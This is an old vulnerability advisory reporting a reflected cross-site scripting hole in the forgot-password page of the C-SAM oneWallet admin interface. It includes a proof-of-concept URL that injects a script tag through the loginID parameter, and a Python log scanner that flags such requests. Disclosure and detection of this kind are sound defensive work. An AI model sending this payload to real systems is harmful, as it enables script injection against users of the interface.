csam-xss.txt

2007-08-08T00:00:00
ID PACKETSTORM:58355
Type packetstorm
Reporter Tushar Vartak
Modified 2007-08-08T00:00:00

Description

An XSS vulnerability has been identified in the C-SAM oneWallet web admin interface. The vulnerability exists in the forgot password page.  
  
http://myserver:myport/tp/web/oneWallet/user/forgotPassStep2.jsp?loginID=null%22%3e%3cscript%3ealert(%22XSS!%22)%3c%2fscript%3e  
  
Successfully tested with Version 210_07062007;1.0  
  
Vendor Website  
  
http://www.c-sam.com  
  
--Tushar Vartak  
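
The following log check is an added example, not part of the original advisory or of C-SAM's code: it flags requests to the page named above whose loginID parameter decodes to HTML metacharacters. The combined access-log format, the sample log lines and all function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Page and parameter named in the advisory.
TARGET_PAGE = "/tp/web/oneWallet/user/forgotPassStep2.jsp"
TARGET_PARAM = "loginID"
# Characters that let a reflected value close an attribute or open a tag.
HTML_META = re.compile(r"[<>\"']")
# Request line of a combined-format access log entry (log format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# Constructed sample log; line 2 carries the query string quoted in the advisory.
SAMPLE_LOG = [
    '192.0.2.10 - - [08/Aug/2007:10:00:01 +0000] "GET /tp/web/oneWallet/user/forgotPassStep2.jsp?loginID=alice HTTP/1.1" 200 512',
    '198.51.100.7 - - [08/Aug/2007:10:00:05 +0000] "GET /tp/web/oneWallet/user/forgotPassStep2.jsp?loginID=null%22%3e%3cscript%3ealert(%22XSS!%22)%3c%2fscript%3e HTTP/1.1" 200 540',
    '198.51.100.7 - - [08/Aug/2007:10:00:09 +0000] "GET /tp/web/oneWallet/user/forgotPassStep2.jsp?loginID=bob%253cb%253e HTTP/1.1" 200 520',
    '192.0.2.11 - - [08/Aug/2007:10:00:12 +0000] "GET /index.html?loginID=%3cb%3e HTTP/1.1" 200 100',
]

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is also seen in clear."""
    for _ in range(rounds):
        value, previous = unquote_plus(value), value
        if value == previous:
            break
    return value

def flag_request(target):
    """Return the decoded loginID if it carries HTML metacharacters, else None."""
    parts = urlsplit(target)
    if parts.path != TARGET_PAGE:
        return None
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        clear = fully_decode(value)
        if name == TARGET_PARAM and HTML_META.search(clear):
            return clear
    return None

def scan(log_lines):
    """Return (line_number, decoded_value) for each flagged log entry."""
    hits = []
    for number, line in enumerate(log_lines, start=1):
        match = REQUEST_RE.search(line)
        hit = flag_request(match.group(1)) if match else None
        if hit is not None:
            hits.append((number, hit))
    return hits

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious loginID {value!r}")
```

A match only shows that markup was sent to the page; whether it was reflected depends on the installed version.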